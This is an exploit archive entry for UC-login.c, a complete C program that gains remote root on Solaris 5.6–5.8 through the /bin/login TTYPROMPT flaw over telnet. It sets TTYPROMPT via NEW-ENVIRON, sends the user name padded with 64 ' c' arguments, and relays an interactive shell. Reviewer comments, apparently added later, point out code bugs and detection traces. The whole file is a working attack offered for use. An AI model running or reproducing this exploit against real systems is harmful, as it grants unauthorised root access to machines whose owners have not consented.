
UC-login.c

UC-login.c
Posted Dec 11, 2002
Authored by Mikecc

SunOS 5.6,5.7,5.8 remote /bin/login root exploit which uses the vulnerability described here.

tags | exploit, remote, root
systems | solaris
SHA-256 | 762c482e53fa3ebd68fcb908fb91f3c8ff15e6d084aa07cd2ab6ce4ec51bf980

UC-login.c

/*
* SunOS 5.6,5.7,5.8 remote /bin/login root exploit
* telnet negotiation learned from good ol' TCP/IP Illustrated
* [mikecc/unixclan]
*
* bugtraq advisory: http://online.securityfocus.com/archive/1/293844
*
* yo to my friends: mstevens, jason, booterr, copperd, dave, ziphie,
* shazam, macd, s0kket, syn, ironfist, ph33r, moke, and digitalfallout
*
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <unistd.h>
#include <getopt.h>

/* Forward declarations for the helpers defined after main(). */
void respond(int,char *);       /* negotiate, send the string, then relay stdin <-> socket */
void negotiate(int);            /* send the fixed WILL/WONT sequence plus one env variable */
void env(int,char *,char *);    /* send one NEW-ENVIRON name/value subnegotiation */
void will(int,int);             /* send IAC WILL <option> */
void wont(int,int);             /* send IAC WONT <option> */

/*
 * Entry point: parse -h/-p/-u, resolve the host, open a TCP connection,
 * build the login string and hand the connected socket to respond().
 *
 * Returns 0 on every path, including lookup, socket and connect failures,
 * so the exit status cannot be used to tell success from failure.
 *
 * NOTE(review): what this program puts on the wire after negotiation is the
 * login name followed by 64 space-separated " c" arguments (see the loop
 * near the end). On the monitoring side, a telnet login line carrying that
 * many arguments, together with a NEW-ENVIRON subnegotiation that sets
 * TTYPROMPT, is the observable trace of this tool; the advisory referenced
 * in the file header describes the affected /bin/login.
 */
int main(int argc,char **argv)
{
/* NOTE(review): sock is never zeroed, so sin_zero and any padding are left indeterminate. */
struct sockaddr_in sock;
struct hostent *pHe;
int sd;
/*
 * NOTE(review): port is a short. Where short is 16 bits, an atoi() result
 * above 32767 becomes negative and is then silently replaced by the default
 * port through the "port < 0" check below.
 */
short port = -1;
int x;
char *host = NULL;
char *user = NULL;
/* Holds the login name plus 64 * 2 bytes of appended arguments and the terminator. */
char exp[1024];
int a;
char *default_port = "23";

printf("UC-login\n");
printf("SunOS/Solaris 5.6,5.7,5.8 /bin/login remote exploit\n");
printf("[mikecc/unixclan] [http://uc.zemos.net/]\n\n");
if (argc < 2)
{
printf("%s -h <victim> [-p port] [-u user]\n",argv[0]);
return 0;
}
while ((a = getopt(argc,argv,"h:p:u:")) != -1)
{
switch (a)
{
case 'h':
host = optarg;
break;

case 'p':
/* atoi() reports no errors: non-numeric input yields 0. */
port = atoi(optarg);
break;

case 'u':
user = optarg;
break;

default:
/* An unknown option is reported but parsing continues. */
printf("[-] invalid option.\n");
break;
}
}
if (host == NULL)
{
printf("[-] must specify a host to attack\n");
return 0;
}
if (user == NULL)
user = "root";
if (port < 0)
port = atoi(default_port);
/* gethostbyname() is IPv4-oriented and obsolete; getaddrinfo() is the modern replacement. */
if ((pHe = gethostbyname(host)) == NULL)
{
printf("Host lookup error.\n");
return 0;
}
printf("[*] attacking %s:%d\n",host,port);
printf("[*] opening socket\n");
if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
{
printf("[-] could not create socket");
return 0;
}
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
/* NOTE(review): h_length is trusted; it is not checked against sizeof(sock.sin_addr.s_addr). */
memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
{
/* The socket is not closed on this path; the process exits right after. */
printf("[-] failed to connect to %s\n",host);
return 0;
}
printf("[*] connected!\n");
printf("[*] setting up exploit string\n");
/*
 * NOTE(review): unbounded copy of a command-line argument into exp. With
 * the 128 bytes appended below, a -u value longer than 895 characters
 * overflows the 1024-byte stack buffer of this program itself.
 */
strcpy(exp,user);
for (x = 0; x < 64; x++)
{
strcat(exp," c");
}
printf("[*] trying to login as %s\n",user);
/* respond() loops forever and leaves through exit(), so the return below is not reached. */
respond(sd,exp);
return 0;
}

/*
* 1. do telnet negotiation
* 2. send the exploit string
* 3. read and write data as if you logged in as root
*/

/*
 * Run the session on an already connected socket: call negotiate(), write
 * expstr once, then relay data between the socket and standard input until
 * the peer closes the connection.
 *
 * sd     - connected socket descriptor
 * expstr - NUL-terminated string written to the socket after negotiation
 *
 * Does not return: the only way out of the loop is exit(-1) when read() on
 * the socket returns 0.
 */
void respond(int sd,char *expstr)
{
char buf[1024];
int x;
fd_set rset;

printf("[*] negotiating\n");
negotiate(sd);
printf("[*] sending exploit string\n");
/* Return value ignored: a short or failed write goes unnoticed. */
write(sd,expstr,strlen(expstr));
printf("[*] did it work? now press enter\n");
fflush(stdout);
FD_ZERO(&rset);
while (1)
{
/* Both descriptors are re-armed every pass because select() clears the ones that are not ready. */
FD_SET(sd,&rset);
FD_SET(0,&rset);
/* NOTE(review): select()'s result is not checked; after an error the set contents are unspecified. */
select(sd+1,&rset,0,0,0);
if (FD_ISSET(sd,&rset))
{
memset(buf,'\0',sizeof(buf));
/*
 * Only a return of 0 (peer closed) is handled. A -1 error return falls
 * through, prints the zeroed buffer and loops again.
 */
if ((x = read(sd,buf,sizeof(buf)-1)) == 0)
{
printf("Connection closed by foreign host.\n");
exit(-1);
}
/*
 * Remote bytes go to the terminal unfiltered, so control and escape
 * sequences sent by the peer reach the local terminal. "%s" also stops at
 * the first NUL, so binary data from the peer is cut short.
 */
fprintf(stderr,"%s",buf);
}
if (FD_ISSET(0,&rset))
{
memset(buf,'\0',sizeof(buf));
/*
 * NOTE(review): a 0 return (end of input on stdin) is ignored, and
 * descriptor 0 is armed again on the next pass - presumably the loop then
 * spins; confirm.
 */
if ((x = read(0,buf,sizeof(buf)-1)) > 0)
{
write(sd,buf,x);
}
}
}
}

/*
* use an environment variable
*
* structure of env variable usage is:
* 1. IAC
* 2. TELOPT_NEW_ENVIRON
* 3. TELQUAL_IS
* 4. NEW_ENV_VAR
* 5. (name)
* 6. NEW_ENV_VALUE
* 7. (value)
* 8. IAC
* 9. SE
*
* (all found in arpa/telnet.h and you specify name and value)
*/

/*
 * Write one telnet NEW-ENVIRON subnegotiation (IAC SB ... IAC SE) carrying
 * a single name/value pair to sd, in the field order given by the format
 * string below.
 *
 * sd   - descriptor to write to
 * name - variable name placed after NEW_ENV_VAR
 * val  - value placed after NEW_ENV_VALUE
 *
 * NOTE(review): sprintf() is unbounded; name and val together must fit in
 * the 1024-byte buffer with the 8 framing bytes, or the stack buffer
 * overflows.
 */
void env(int sd,char *name,char *val)
{
char buf[1024];

memset(buf,'\0',sizeof(buf));
sprintf(buf,"%c%c%c%c%c%s%c%s%c%c",
IAC,SB,TELOPT_NEW_ENVIRON,TELQUAL_IS,NEW_ENV_VAR,name,
NEW_ENV_VALUE,val,IAC,SE);
/*
 * The length is hard-coded: 5 header bytes + 9 ("TTYPROMPT") + 1 + 6
 * ("abcdef") + 2 trailer bytes = 23, which matches only the single call
 * made from negotiate(). Any other name/value pair would be cut short or
 * padded with the NULs left by memset(). strlen(buf) would not work as a
 * replacement where TELQUAL_IS is 0 (its usual value in arpa/telnet.h),
 * because %c then stores a NUL in the fourth byte.
 */
write(sd,buf,23); /* no error checking, uh-oh! */
}

/*
* telnet negotiation needed for
* talking with the telnet protocol
*/

/*
 * Send a fixed sequence of telnet option commands on sd, followed by one
 * NEW-ENVIRON variable.
 *
 * Nothing is read from the socket here: the commands are sent without
 * waiting for, or answering, the server's own option requests. The order of
 * the calls is the order of the bytes on the wire.
 */
void negotiate(int sd)
{
/* Refused options: terminal type, window size, X display location. */
wont(sd,TELOPT_TTYPE);
wont(sd,TELOPT_NAWS);
wont(sd,TELOPT_XDISPLOC);
/* Accepted options: remote flow control and linemode. */
will(sd,TELOPT_LFLOW);
will(sd,TELOPT_LINEMODE);
/* The old environment option is refused and the new one accepted, so env() below uses NEW-ENVIRON. */
wont(sd,TELOPT_OLD_ENVIRON);
will(sd,TELOPT_NEW_ENVIRON);
will(sd,TELOPT_BINARY);
/*
 * Sets TTYPROMPT to a six-character value. The name and value lengths must
 * stay at 9 and 6 because env() writes exactly 23 bytes. A client-supplied
 * TTYPROMPT in a NEW-ENVIRON subnegotiation is a field a telnet-aware
 * monitor can match on.
 */
env(sd,"TTYPROMPT","abcdef");
}

/*
* send a telnet WONT
*
* structure of a telnet WONT is:
* 1. IAC
* 2. WONT
* 3. what you wont do
* (all of the above are found in arpa/telnet.h)
*/

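/*
 * Send the three-byte telnet command IAC WONT <opt> on sd.
 *
 * sd  - descriptor to write to
 * opt - telnet option code; only its low 8 bits are sent
 *
 * The bytes are stored directly instead of going through sprintf(): the
 * original formatted three "%c" conversions into a char[3], so the
 * terminating NUL was written one byte past the end of the buffer.
 */
void wont(int sd,int opt)
{
    unsigned char buf[3];

    buf[0] = IAC;
    buf[1] = WONT;
    buf[2] = (unsigned char)opt; /* same narrowing that "%c" performed */
    write(sd,buf,sizeof(buf)); /* return value still ignored, as before */
}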

/*
* send a telnet WILL
*
* structure of a telnet WILL is:
* 1. IAC
* 2. WILL
* 3. what you will do
* (all of the above are found in arpa/telnet.h)
*/

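/*
 * Send the three-byte telnet command IAC WILL <opt> on sd.
 *
 * sd  - descriptor to write to
 * opt - telnet option code; only its low 8 bits are sent
 *
 * The bytes are stored directly instead of going through sprintf(): the
 * original formatted three "%c" conversions into a char[3], so the
 * terminating NUL was written one byte past the end of the buffer.
 */
void will(int sd,int opt)
{
    unsigned char buf[3];

    buf[0] = IAC;
    buf[1] = WILL;
    buf[2] = (unsigned char)opt; /* same narrowing that "%c" performed */
    write(sd,buf,sizeof(buf)); /* return value still ignored, as before */
}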

